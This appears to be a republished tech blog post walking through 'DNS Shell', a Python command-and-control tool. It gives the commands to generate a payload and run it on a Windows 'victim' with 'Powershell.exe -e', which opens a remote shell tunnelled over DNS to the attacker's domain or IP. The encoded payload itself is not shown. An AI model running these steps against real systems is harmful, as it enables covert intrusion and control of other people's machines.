31 C
Jaipur
Thursday, October 29, 2020

DNS Shell – Tool to Compromise and Maintain control Over Victim Machine

Must read

After Ubuntu 20.10 Release, Ubuntu 21.04 Is Codenamed “Hirsute Hippo”

A week after the latest Ubuntu 20.10 “Groovy Gorilla” release, Matthias Klose from Ubuntu dev team has now kicked off the development of the...

iPhone 12 Pro’s Ceramic Shield Is Not as Scratch Resistant as You Might Expect

iPhone 12 series may not have changed a whole lot on the design front. The company, however, adopted a new Ceramic Shield to safeguard...

Gaming On Linux To Get Major Improvements, Thanks To Collabora

Gone are the days when people would criticize Linux for its incapability to run games. Thanks to the vast open source community, gaming on...

DNS protocol runs on the application layer of the TCP/IP Model. When an attacker or pentester tries to exploit DNS with RCE vulnerability (Remote Command Execution) destination server acts as the backdoor.

DNS Shell Tool is a python based Exploitation tool to compromise and also maintaining the access via command and control to the server.

Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)

ATTACKER MACHINE

  • Download the DNS SHELL tool HERE
  • Execute the command: python DNS-SHELL.py
  • It can be utilized with different modes, Recursive mode (It will run the DNS name) and Direct mode will run as Ip address provided (Kali Linux IP)

Generating Payload – DNS Shell

  • Above Figure is Recursive mode.
  • Recursive Command Executed: Python DNS-Shell.py -l -r <Domain Name>

NOTE: Command to be executed for direct mode: Python DNS-Shell.py -l -d

  • Above figure shows recursive mode has generated payload.

Victims Machine

  • Run & Execute the Command with CMD: Powershell.exe -e <Copy and paste the Generated Payload HERE>

BACK TO ATTACKERS MACHINE

  • Once the payload is executed in victims machine. Shell of Windows 10 machine is obtained.
  • Above Figure shows destination (windows 10) now acts as backdoor and command is entered and turns to Convert Channel to over port 53 of DNS.Happy Hacking !!!

Source link

- Advertisement -

More articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest article

After Ubuntu 20.10 Release, Ubuntu 21.04 Is Codenamed “Hirsute Hippo”

A week after the latest Ubuntu 20.10 “Groovy Gorilla” release, Matthias Klose from Ubuntu dev team has now kicked off the development of the...

iPhone 12 Pro’s Ceramic Shield Is Not as Scratch Resistant as You Might Expect

iPhone 12 series may not have changed a whole lot on the design front. The company, however, adopted a new Ceramic Shield to safeguard...

Gaming On Linux To Get Major Improvements, Thanks To Collabora

Gone are the days when people would criticize Linux for its incapability to run games. Thanks to the vast open source community, gaming on...

Call Of Duty Mobile Season 12 Expected Release Date

A few days back, Call of Duty Mobile released the Season 11 update to celebrate the game’s first anniversary. There’s a lot of amazing...